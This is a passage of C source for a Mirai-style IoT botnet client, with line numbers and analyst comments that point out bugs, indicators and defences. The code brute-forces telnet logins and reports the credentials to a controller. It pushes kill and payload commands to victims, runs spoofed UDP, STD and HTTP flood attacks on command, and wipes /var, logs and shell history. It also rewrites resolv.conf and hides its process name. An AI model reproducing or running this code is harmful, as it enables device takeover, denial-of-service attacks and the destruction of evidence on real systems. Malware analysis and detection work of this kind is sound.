  2694. fds[i].complete = 1;
  2695. continue; }
  2696. fds[i].state = 4; }
  2697. break;
  2698. case 4: {
  2699. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances))
  2700. {
  2701. if(contains_fail(fds[i].sockbuf)) {
  2702. fds[i].state = 0;
  2703. } else {
  2704. fds[i].state = 5; }
  2705. continue; }
  2706. if(fds[i].tTimeout + 6 < time(NULL)) {
  2707. fds[i].state = 0;
  2708. fds[i].complete = 1;
  2709. }
  2710. }
  2711. break;
  // State 5: send the current password followed by CRLF.
  2712. case 5: {
  2713. if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
  2714. fds[i].state = 0;
  2715. fds[i].complete = 1;
  2716. continue; }
  2717. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  2718. fds[i].state = 0;
  2719. fds[i].complete = 1;
  2720. continue; }
  2721. fds[i].state = 6;
  2722. }
  2723. break;
  // State 6: any response from the `advances2` list that contains_fail() does
  // not flag is treated as a successful login and reported on mainCommSock.
  2724. case 6: {
  2725. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 256, advances2)) {
  2726. fds[i].tTimeout = time(NULL);
  2727. if (contains_fail(fds[i].sockbuf)) {
  2728. fds[i].state = 0;
  2729. } else {
  2730. sockprintf(mainCommSock, "[ MIRAI ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2731. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2732. fds[i].state = 7;
  2733. } continue; }
  2734. if (fds[i].tTimeout + 6 < time(NULL)) {
  2735. fds[i].state = 0;
  2736. fds[i].complete = 1;
  2737. }
  2738. }
  2739. break;
  // State 7: send `rm -rf ...` and `pkill -9 ...;killall -9 ...` command lines
  // built from Temp_Directorys and Bot_Killer_Binarys, then Busybox_Payload.
  // Each step is also announced on mainCommSock. On the receiving device this
  // command sequence inside one telnet session is a usable logging pattern.
  // RemoveTempDirs() runs on the local host; its body is not visible here.
  2740. case 7: {
  2741. char RemoveTheTempDirs [80];
  2742. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
  2743. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2744. RemoveTempDirs();
  2745. sockprintf(mainCommSock, "[ MIRAI ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2746. char killtheproccesses[80];
  2747. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
  2748. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
  2749. sockprintf(mainCommSock, "[ MIRAI ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
  2750. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
  2751. fds[i].state = 0;
  2752. fds[i].complete = 1;
  2753. continue; }
  2754. fds[i].state = 8;
  2755. }
  2756. break;
  // State 8: send Busybox_Payload again. tTimeout is refreshed at the top of this
  // case on every pass, so the 60-second check below compares against a
  // timestamp taken moments earlier.
  2757. case 8: {
  2758. fds[i].tTimeout = time(NULL);
  2759. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
  2760. sclose(fds[i].fd);
  2761. fds[i].state = 0;
  2762. fds[i].complete = 1;
  2763. continue; }
  2764. fds[i].complete = 3;
  2765. if(fds[i].tTimeout + 60 < time(NULL)) {
  2766. if(fds[i].complete !=3){
  2767. }
  2768. fds[i].state = 0;
  2769. fds[i].complete = 1;
  2770. }
  2771. break;
  2772. }
  2773. }
  2774. }
  2775. }
  2776. }
  // SendSTD: UDP traffic generator aimed at one host for `secs` seconds.
  //   ip   - host name or dotted address, resolved with gethostbyname()
  //   port - stored into sin_port as given (no byte-order conversion is applied)
  //   secs - run time; the process calls _exit(0) once it has elapsed
  // The function does not return: it ends the calling process.
  //
  // Analyst notes:
  // - Each send() asks for 69 bytes starting at the literal "std", so the
  //   datagram is a fixed 69 bytes whose first bytes are 's','t','d'. What
  //   follows the literal in memory is not defined by this code.
  // - The result of gethostbyname() is dereferenced without a NULL check.
  // - The time limit is only examined on every 50th loop pass.
  2777. void SendSTD(unsigned char *ip, int port, int secs) {
  2778. int iSTD_Sock;
  2779. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  2780. time_t start = time(NULL);
  2781. struct sockaddr_in sin;
  2782. struct hostent *hp;
  2783. hp = gethostbyname(ip);
  2784. bzero((char*) &sin,sizeof(sin));
  2785. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  2786. sin.sin_family = hp->h_addrtype;
  2787. sin.sin_port = port;
  2788. unsigned int a = 0;
  2789. while(1){
  // `a` is a pass counter: the socket calls and the deadline check run once per 50 passes.
  2790. if (a >= 50) {
  2791. send(iSTD_Sock, "std", 69, 0);
  2792. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  2793. if (time(NULL) >= start + secs) {
  2794. close(iSTD_Sock);
  2795. _exit(0);
  2796. }
  2797. a = 0;
  2798. }
  2799. a++;
  2800. }
  2801. }
  // SendUDP: raw-socket UDP traffic generator with a forged source address.
  //   target       - host resolved through getHost(); the function returns if that fails
  //   port         - destination port; 0 selects a new rand_cmwc() value per packet
  //   timeEnd      - run time in seconds
  //   packetsize   - UDP payload length in bytes
  //   pollinterval - number of packets sent between checks of the deadline
  //   spoofit      - prefix length used to build the netmask passed to getRandomIP()
  //
  // Analyst notes:
  // - The socket is SOCK_RAW with IP_HDRINCL, so the program writes its own IP
  //   header, including the source address. Raw sockets need elevated privilege
  //   on Linux, so this path only works where the process has it.
  // - Source address, source port and IP id change on every packet; the payload
  //   is filled once by makeRandomStr() before the loop and then reused.
  // - Because the source addresses are forged, source-address validation at the
  //   network edge (ingress/egress filtering) is the control that stops this
  //   traffic from leaving a network; per-source rate limits at the receiver do not.
  2802. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
  2803. struct sockaddr_in dest_addr;
  2804. dest_addr.sin_family = AF_INET;
  2805. if(port == 0) dest_addr.sin_port = rand_cmwc();
  2806. else dest_addr.sin_port = htons(port);
  2807. if(getHost(target, &dest_addr.sin_addr)) return;
  2808. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2809. register unsigned int pollRegister;
  2810. pollRegister = pollinterval;
  2811. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  2812. if(!sockfd) {
  2813. return;
  2814. }
  2815. int tmp = 1;
  2816. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
  2817. return;
  2818. }
  // Re-seed both generators 50 times before building the packet.
  2819. int counter = 50;
  2820. while(counter--) {
  2821. srand(time(NULL) ^ rand_cmwc());
  2822. init_rand(rand());
  2823. }
  2824. in_addr_t netmask;
  2825. netmask = ( ~((1 << (32 - spoofit)) - 1) );
  // The packet buffer is a stack array sized from the caller-supplied packetsize.
  2826. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  2827. struct iphdr *iph = (struct iphdr *)packet;
  2828. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  2829. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  2830. udph->len = htons(sizeof(struct udphdr) + packetsize);
  2831. udph->source = rand_cmwc();
  2832. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2833. udph->check = 0;
  2834. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  2835. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2836. int end = time(NULL) + timeEnd;
  2837. register unsigned int i = 0;
  2838. while(1) {
  2839. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  // Rewrite the per-packet header fields and recompute the IP checksum for the next send.
  2840. udph->source = rand_cmwc();
  2841. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2842. iph->id = rand_cmwc();
  2843. iph->saddr = htonl( getRandomIP(netmask) );
  2844. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2845. if(i == pollRegister) {
  2846. if(time(NULL) > end) break;
  2847. i = 0;
  2848. continue;
  2849. }
  2850. i++;
  2851. }
  2852. }
  // socket_connect: resolve `host` and open a blocking TCP connection to `port`.
  // Returns the connected socket descriptor, or 0 when name resolution, socket
  // creation or connect() fails. Callers in this file test the result against 0.
  // Notes: TCP_NODELAY is requested before the socket() result is checked, and
  // the descriptor is not closed on the connect() failure path.
  2853. int socket_connect(char *host, in_port_t port) {
  2854. struct hostent *hp;
  2855. struct sockaddr_in addr;
  2856. int on = 1, sock;
  2857. if ((hp = gethostbyname(host)) == NULL) return 0;
  2858. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  2859. addr.sin_port = htons(port);
  2860. addr.sin_family = AF_INET;
  2861. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  2862. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  2863. if (sock == -1) return 0;
  2864. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
  2865. return sock;
  2866. }
  // SendHTTP: repeated HTTP request generator against one host.
  //   method, path, host - copied into the request line and Host header
  //   port               - TCP port passed to socket_connect()
  //   timeEnd            - run time in seconds
  //   power              - number of loop passes, each of which calls fork()
  //
  // Analyst notes:
  // - The request is formatted with sprintf() into a 512-byte stack buffer from
  //   caller-supplied strings, with no length check.
  // - The looping branch is taken when fork() returns non-zero; the process
  //   that receives 0 continues the for loop and forks again.
  // - Traffic shape seen by the server: a new TCP connection per request, one
  //   request with "Connection: close", a User-Agent drawn from a 36-entry
  //   table (useragents, defined elsewhere), then the client reads a single
  //   byte and closes. Connection-rate limiting and dropping clients that
  //   never read the response body are the matching server-side controls.
  2867. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
  2868. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
  2869. char request[512], buffer[1];
  2870. for (i = 0; i < power; i++) {
  2871. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
  2872. if (fork()) {
  2873. while (end > time(NULL)) {
  2874. socket = socket_connect(host, port);
  2875. if (socket != 0) {
  2876. write(socket, request, strlen(request));
  2877. read(socket, buffer, 1);
  2878. close(socket);
  2879. }
  2880. }
  2881. exit(0);
  2882. }
  2883. }
  2884. }
  // ClearHistory: anti-forensics step run through system().
  // The first command asks the shell spawned by system() to clear and rewrite
  // its history; the second deletes ~/.bash_history for the account the
  // process runs as. Return values of both calls are ignored.
  //
  // Analyst notes: a missing or freshly truncated .bash_history on a device is
  // itself an indicator worth recording. Shell history is not a reliable
  // evidence source for this reason; process-execution auditing shipped
  // off-host survives this step.
  2885. void ClearHistory()
  2886. {
  2887. system("history -c;history -w");
  2888. system("cd /;rm -rf ~/.bash_history");
  2889. }
  // Command dispatcher for lines received from the controller.
  //   argc - number of entries in argv
  //   argv - argv[0] is the command word (upper-cased by main), argv[1..] its arguments
  // Each recognised command starts a child process for a scanner or flood routine,
  // kills a previously started one, or acts on the bot process itself.
  // NOTE(review): several branches read argv[1] or higher without checking argc first.
  // Defender notes: the literal command words compared below are stable static
  // strings, useful both for signature matching on a sample and for decoding
  // captured controller traffic.
  2890. void processCmd(int argc, unsigned char *argv[]) {
  // TELNET ON|OFF|FASTLOAD - controls the telnet scanner (TelnetScanner, defined elsewhere).
  2891. if(!strcmp(argv[0], "TELNET"))
  2892. {
  2893. if(!strcmp(argv[1], "ON"))
  2894. {
  // The fork() result is kept in an unsigned type, so a failed fork (-1) also
  // satisfies `parent > 0` and the `parent == -1` branch below is not reached.
  2895. uint32_t parent;
  2896. parent = fork();
  2897. int ii = 0;
  2898. int forks = sysconf( _SC_NPROCESSORS_ONLN );
  // fds: 500 with one online CPU, 1000 with two or more; 999999 remains only if sysconf() returned < 1.
  2899. int fds = 999999;
  2900. if(forks == 1) fds = 500;
  2901. if(forks >= 2) fds = 1000;
  // Parent: remember the scanner child's pid for a later OFF and return.
  2902. if (parent > 0)
  2903. {
  2904. scanPid = parent;
  2905. return;
  2906. }
  2907. else if(parent == -1) return;
  // Child: the loop body ends in _exit(0), so it executes once regardless of `forks`.
  2908. for (ii = 0; ii < forks; ii++)
  2909. {
  2910. srand((time(NULL) ^ getpid()) + getppid());
  2911. init_rand(time(NULL) ^ getpid());
  2912. TelnetScanner(100, fds);
  2913. _exit(0);
  2914. }
  2915. }
  // OFF: send signal 9 (SIGKILL) to the recorded scanner child, if any.
  2916. if(!strcmp(argv[1], "OFF"))
  2917. {
  2918. if(scanPid == 0) return;
  2919. kill(scanPid, 9);
  2920. scanPid = 0;
  2921. }
  // FASTLOAD: argv[1] is the literal "FASTLOAD" in this branch, so atoi(argv[1])
  // yields 0; argv[2] is read without an argc check.
  2922. if(!strcmp(argv[1], "FASTLOAD"))
  2923. {
  2924. int threads = atoi(argv[1]);
  2925. int usec = atoi(argv[2]);
  // listFork() is defined elsewhere; presumably it returns 0 in the new child - confirm.
  2926. if(!listFork())
  2927. {
  2928. //sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
  2929. TelnetScanner(usec, threads);
  2930. _exit(0);
  2931. }
  2932. return;
  2933. }
  2934. }
  // MIRAI ON|OFF|FASTLOAD - same structure as the TELNET branch, driving
  // MiraiScanner (defined elsewhere) and tracking the child in miraiPid.
  2935. if(!strcmp(argv[0], "MIRAI"))
  2936. {
  2937. if(!strcmp(argv[1], "ON"))
  2938. {
  2939. uint32_t parent;
  2940. parent = fork();
  2941. int ii = 0;
  2942. int forks = sysconf( _SC_NPROCESSORS_ONLN );
  2943. int fds = 999999;
  2944. if(forks == 1) fds = 500;
  2945. if(forks >= 2) fds = 1000;
  2946. if (parent > 0)
  2947. {
  2948. miraiPid = parent;
  2949. return;
  2950. }
  2951. else if(parent == -1) return;
  2952. for (ii = 0; ii < forks; ii++)
  2953. {
  2954. srand((time(NULL) ^ getpid()) + getppid());
  2955. init_rand(time(NULL) ^ getpid());
  2956. MiraiScanner(100, fds);
  2957. _exit(0);
  2958. }
  2959. }
  2960. if(!strcmp(argv[1], "OFF"))
  2961. {
  2962. if(miraiPid == 0) return;
  2963. kill(miraiPid, 9);
  2964. miraiPid = 0;
  2965. }
  2966. if(!strcmp(argv[1], "FASTLOAD"))
  2967. {
  2968. int threads = atoi(argv[1]);
  2969. int usec = atoi(argv[2]);
  2970. if(!listFork())
  2971. {
  2972. //sockprintf(mainCommSock, "Starting scanner!!");
  2973. MiraiScanner(usec, threads);
  2974. _exit(0);
  2975. }
  2976. return;
  2977. }
  2978. }
  // PHONE ON|OFF - exactly one argument required. ON runs PhoneScanner() (defined
  // elsewhere) in a forked child unless one is already recorded in Phonepid;
  // OFF sends SIGKILL to that child.
  2979. if(!strcmp(argv[0], "PHONE")) {
  2980. if(argc != 2) {
  2981. return; }
  2982. if(!strcmp(argv[1], "OFF")) {
  2983. if(Phonepid == 0) return;
  2984. kill(Phonepid, 9);
  2985. Phonepid = 0; }
  2986. if(!strcmp(argv[1], "ON")) {
  2987. if(Phonepid != 0) return;
  2988. uint32_t parent;
  2989. parent = fork();
  2990. if (parent > 0) { Phonepid = parent; return;}
  2991. else if(parent == -1) return;
  2992. PhoneScanner();
  2993. _exit(0);
  2994. }
  2995. }
  // MIRAITEST ON|OFF - same toggle pattern, child runs MiraiHackaShit(), pid kept in testmiraiPid.
  2996. if(!strcmp(argv[0], "MIRAITEST")) {
  2997. if(argc != 2) {
  2998. return; }
  2999. if(!strcmp(argv[1], "OFF")) {
  3000. if(testmiraiPid == 0) return;
  3001. kill(testmiraiPid, 9);
  3002. testmiraiPid = 0; }
  3003. if(!strcmp(argv[1], "ON")) {
  3004. if(testmiraiPid != 0) return;
  3005. uint32_t parent;
  3006. parent = fork();
  3007. if (parent > 0) { testmiraiPid = parent; return;}
  3008. else if(parent == -1) return;
  3009. MiraiHackaShit();
  3010. _exit(0);
  3011. }
  3012. }
  // TELNETTEST ON|OFF - same toggle pattern, child runs HackaShit(), pid kept in testtelnetPid.
  3013. if(!strcmp(argv[0], "TELNETTEST")) {
  3014. if(argc != 2) {
  3015. return; }
  3016. if(!strcmp(argv[1], "OFF")) {
  3017. if(testtelnetPid == 0) return;
  3018. kill(testtelnetPid, 9);
  3019. testtelnetPid = 0; }
  3020. if(!strcmp(argv[1], "ON")) {
  3021. if(testtelnetPid != 0) return;
  3022. uint32_t parent;
  3023. parent = fork();
  3024. if (parent > 0) { testtelnetPid = parent; return;}
  3025. else if(parent == -1) return;
  3026. HackaShit();
  3027. _exit(0);
  3028. }
  3029. }
  // BCM ON|OFF - same toggle pattern, child runs BCMscanner(), pid kept in bcmPid.
  3030. if(!strcmp(argv[0], "BCM")) {
  3031. if(argc != 2) {
  3032. return; }
  3033. if(!strcmp(argv[1], "OFF")) {
  3034. if(bcmPid == 0) return;
  3035. kill(bcmPid, 9);
  3036. bcmPid = 0; }
  3037. if(!strcmp(argv[1], "ON")) {
  3038. if(bcmPid != 0) return;
  3039. uint32_t parent;
  3040. parent = fork();
  3041. if (parent > 0) { bcmPid = parent; return;}
  3042. else if(parent == -1) return;
  3043. BCMscanner();
  3044. _exit(0);
  3045. }
  3046. }
  3047.  
  3048. if (!strcmp(argv[0], "HTTP"))
  3049. {
  3050. // !* HTTP METHOD TARGET PORT PATH TIME POWER
  3051. // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
  // NOTE(review): the guard admits argc == 6, yet argv[6] (POWER) is read below.
  3052. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
  // A non-zero listFork() returns to the caller (presumably the parent - confirm);
  // the other process runs the flood and then exits.
  3053. if (listFork()) return;
  3054. SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
  3055. exit(0);
  3056. }
  3057. if(!strcmp(argv[0], "UDP"))
  3058. {
  3059. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
  // Rejects fewer than 6 entries, any of port/time/size equal to -1, a size above
  // 1024, and a poll interval below 1 when argc is exactly 6.
  3060. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
  3061. {
  3062. return;
  3063. }
  // The local named `time` shadows time() inside this block.
  3064. unsigned char *ip = argv[1];
  3065. int port = atoi(argv[2]);
  3066. int time = atoi(argv[3]);
  3067. int packetsize = atoi(argv[4]);
  3068. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
  // Fixed value handed to SendUDP; its meaning is defined there (not visible here).
  3069. int spoofed = 32;
  // A comma-separated target list is split in place with strtok(); one
  // listFork() child is started per entry.
  3070. if(strstr(ip, ",") != NULL)
  3071. {
  3072. unsigned char *hi = strtok(ip, ",");
  3073. while(hi != NULL)
  3074. {
  3075. if(!listFork())
  3076. {
  3077. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
  3078. _exit(0);
  3079. }
  3080. hi = strtok(NULL, ",");
  3081. }
  3082. } else {
  3083. if (listFork())
  3084. {
  3085. return;
  3086. }
  3087. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
  3088. _exit(0);
  3089. }
  3090. }
  3091. if(!strcmp(argv[0], "STD"))
  3092. {
  3093. //!* STD TARGET PORT TIME
  // Same single-target / comma-list handling as the UDP branch, calling SendSTD (defined elsewhere).
  3094. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  3095. {
  3096. return;
  3097. }
  3098. unsigned char *ip = argv[1];
  3099. int port = atoi(argv[2]);
  3100. int time = atoi(argv[3]);
  3101. if(strstr(ip, ",") != NULL)
  3102. {
  3103. unsigned char *hi = strtok(ip, ",");
  3104. while(hi != NULL)
  3105. {
  3106. if(!listFork())
  3107. {
  3108. SendSTD(hi, port, time);
  3109. _exit(0);
  3110. }
  3111. hi = strtok(NULL, ",");
  3112. }
  3113. } else {
  3114. if (listFork())
  3115. {
  3116. return;
  3117. }
  3118. SendSTD(ip, port, time);
  3119. _exit(0);
  3120. }
  3121. }
  // KILLATTK: SIGKILL every non-zero entry of pids[] other than this process.
  // `killed` is counted, but both result branches are empty, so nothing is reported.
  3122. if(!strcmp(argv[0], "KILLATTK"))
  3123. {
  3124. int killed = 0;
  3125. unsigned long i;
  3126. for (i = 0; i < numpids; i++)
  3127. {
  3128. if (pids[i] != 0 && pids[i] != getpid())
  3129. {
  3130. kill(pids[i], 9);
  3131. killed++;
  3132. }
  3133. }
  3134. if(killed > 0)
  3135. {
  3136. //
  3137. } else {
  3138. //
  3139. }
  3140. }
  // LOLNOGTFO: terminates this bot process.
  3141. if(!strcmp(argv[0], "LOLNOGTFO"))
  3142. {
  3143. exit(0);
  3144. }
  // UPDATE: despite the name, nothing is downloaded here; it runs the destructive
  // RemoveTempDirs() cleanup and reports build/endianness back over mainCommSock.
  3145. if(!strcmp(argv[0], "UPDATE"))
  3146. {
  3147. RemoveTempDirs();
  3148. sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
  3149. }
  3150. }
  // Selects a controller address and connects to it.
  // Returns 0 on success and 1 when connectTimeout() reports failure.
  // mainCommSock is used twice: first as the index into the server table, then,
  // after socket(), as the connection descriptor.
  // NOTE(review): SERVER_LIST_SIZE is computed from commServer, but the entry is
  // read from Busybox_Payload - confirm which table really holds the addresses.
  // Defender notes: the "host[:port]" strings in that table, plus the default
  // port in Server_Botport, are the controller indicators to extract from a sample.
  3151. int initConnection() {
  3152. unsigned char server[4096];
  3153. memset(server, 0, 4096);
  // Any open descriptor is closed and the variable reset to 0 before it is reused as an index.
  3154. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
  3155. if(mainCommSock + 1 == SERVER_LIST_SIZE) mainCommSock = 0;
  3156. else mainCommSock++;
  // Unbounded strcpy() into the 4096-byte buffer.
  3157. strcpy(server, Busybox_Payload[mainCommSock]);
  3158. int port = Server_Botport;
  // An optional ":port" suffix overrides the default and is cut off the host string.
  3159. if(strchr(server, ':') != NULL) {
  3160. port = atoi(strchr(server, ':') + 1);
  3161. *((unsigned char *)(strchr(server, ':'))) = 0x0; }
  3162. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
  // 30 is passed as connectTimeout's last argument (presumably seconds - confirm in its definition).
  3163. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
  3164. return 0;
  3165. }
  // Overwrites /etc/resolv.conf with two public resolvers (8.8.8.8 and 8.8.4.4).
  // The file is opened with O_TRUNC, so existing content is discarded as soon as
  // the open succeeds, before the access() check runs.
  // NOTE(review): the descriptor is stored in a uint16_t, so a failed open() (-1)
  // becomes 65535 and goes unnoticed; write() is unchecked; the else path returns
  // without close().
  // Defender notes: file-integrity monitoring on /etc/resolv.conf catches this
  // change, and the exact two-line content written here is a host indicator.
  3166. void UpdateNameSrvs() {
  3167. uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
  3168. if (access("/etc/resolv.conf", F_OK) != -1) {
  3169. const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
  3170. size_t resl = strlen(resd);
  3171. write(fhandler, resd, resl);
  3172. } else { return; }
  3173. close(fhandler);
  3174. }
  // Destructive cleanup, run at controller check-in (main) and on the UPDATE
  // command: deletes the contents of /tmp, /var, /var/run and /var/tmp, the
  // /var/log/wtmp login record and ~/.bash_history, then asks the shell to clear
  // its history. Everything goes through system(); results are ignored.
  // Defender notes: "/var/*" takes local logs with it on layouts where /var/log
  // lives under /var, so evidence has to come from off-host log collection. The
  // sudden loss of /var content, and these rm command lines in process-exec
  // telemetry, are indicators in their own right.
  3175. void RemoveTempDirs() {
  3176. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
  3177. system("rm -rf /var/log/wtmp");
  3178. system("rm -rf ~/.bash_history");
  3179. system("history -c;history -w");
  3180. }
  // Reports the host byte order by storing bytes 00 01 02 03 in a union and
  // reading them back as one uint32_t.
  // NOTE(review): the function is declared int but every return statement yields
  // a string literal; the callers visible in this file pass the result to a "%s"
  // conversion.
  3181. int getEndianness(void)
  3182. {
  3183. union
  3184. {
  3185. uint32_t vlu;
  3186. uint8_t data[sizeof(uint32_t)];
  3187. } nmb;
  3188. nmb.data[0] = 0x00;
  3189. nmb.data[1] = 0x01;
  3190. nmb.data[2] = 0x02;
  3191. nmb.data[3] = 0x03;
  // The four recognised layouts: big, little, and the two variants with the
  // 16-bit halves swapped; anything else is reported as "UNKNOWN".
  3192. switch (nmb.vlu)
  3193. {
  3194. case UINT32_C(0x00010203):
  3195. return "BIG_ENDIAN";
  3196. case UINT32_C(0x03020100):
  3197. return "LITTLE_ENDIAN";
  3198. case UINT32_C(0x02030001):
  3199. return "BIG_ENDIAN_W";
  3200. case UINT32_C(0x01000302):
  3201. return "LITTLE_ENDIAN_W";
  3202. default:
  3203. return "UNKNOWN";
  3204. }
  3205. }
  // Records the host's outward-facing IPv4 address in the global ourIP and the MAC
  // address of the default-route interface in the global macAddress.
  // Returns 0 on the early failure paths; the success path has no return statement.
  // NOTE(review): the early returns after socket() leave `sock` open, and the
  // open() of /proc/net/route is not checked.
  3206. int getOurIP() {
  // Step 1: connect a UDP socket towards 8.8.8.8:53 and read the local address
  // back with getsockname(). connect() on a datagram socket only fixes the peer,
  // so this step by itself sends no packet.
  3207. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  3208. if(sock == -1) return 0;
  3209. struct sockaddr_in serv;
  3210. memset(&serv, 0, sizeof(serv));
  3211. serv.sin_family = AF_INET;
  3212. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  3213. serv.sin_port = htons(53);
  3214. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
  3215. if(err == -1) return 0;
  3216. struct sockaddr_in name;
  3217. socklen_t namelen = sizeof(name);
  3218. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  3219. if(err == -1) return 0;
  3220. ourIP.s_addr = name.sin_addr.s_addr;
  // Step 2: scan /proc/net/route for the line containing a tab-delimited
  // 00000000 field (the default route) and keep its first field, the interface name.
  // fdgets() is defined elsewhere in the file.
  3221. int cmdline = open("/proc/net/route", O_RDONLY);
  3222. char linebuf[4096];
  3223. while(fdgets(linebuf, 4096, cmdline) != NULL)
  3224. {
  3225. if(strstr(linebuf, "\t00000000\t") != NULL)
  3226. {
  3227. unsigned char *pos = linebuf;
  3228. while(*pos != '\t') pos++;
  3229. *pos = 0;
  3230. break;
  3231. }
  // Non-matching lines are wiped so that *linebuf stays 0 when no match is found.
  3232. memset(linebuf, 0, 4096);
  3233. }
  3234. close(cmdline);
  // Step 3: ask the kernel for that interface's hardware address and copy its 6 bytes.
  3235. if(*linebuf)
  3236. {
  3237. int i;
  3238. struct ifreq ifr;
  // Unbounded strcpy() into ifr_name; the ioctl() result is not checked.
  3239. strcpy(ifr.ifr_name, linebuf);
  3240. ioctl(sock, SIOCGIFHWADDR, &ifr);
  3241. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  3242. }
  3243. close(sock);
  3244. }
  // Bot entry point. Sequence: blank the process name, seed the PRNGs, record the
  // local IP/MAC, double-fork to detach from the launcher, then connect to the
  // controller and run the command loop.
  // Defender notes (host side): a process whose argv[0] and thread name are both
  // empty, running with cwd "/", that rewrites /etc/resolv.conf and empties
  // /tmp and /var right after an outbound TCP connect.
  // Defender notes (network side): the check-in line beginning "[ CONNECTED ] IP:"
  // is built from a fixed format string; assuming sockprintf() writes it to the
  // socket as plain text (confirm in its definition), it is a usable signature.
  3245. int main(int argc, unsigned char *argv[]) {
  3246. const char *lolsuckmekid = "";
  3247. if(SERVER_LIST_SIZE <= 0) return 0;
  // strncpy() with an empty source zero-fills all strlen(argv[0]) bytes, blanking
  // the original command line in place; argv[0] is then repointed at "".
  3248. strncpy(argv[0],"",strlen(argv[0]));
  3249. argv[0] = "";
  // Sets the thread name to the empty string as well.
  3250. prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
  3251. srand(time(NULL) ^ getpid());
  3252. init_rand(time(NULL) ^ getpid());
  3253. pid_t pid1;
  3254. pid_t pid2;
  3255. int status;
  3256. getOurIP();
  // Double fork: the original process waits for the intermediate child and exits,
  // the intermediate child exits right after the second fork, and the grandchild
  // carries on below. A failed fork (-1) also takes the first branch of each test.
  3257. if (pid1 = fork()) {
  3258. waitpid(pid1, &status, 0);
  3259. exit(0);
  3260. } else if (!pid1) {
  3261. if (pid2 = fork()) {
  3262. exit(0);
  3263. } else if (!pid2) {
  3264. } else {
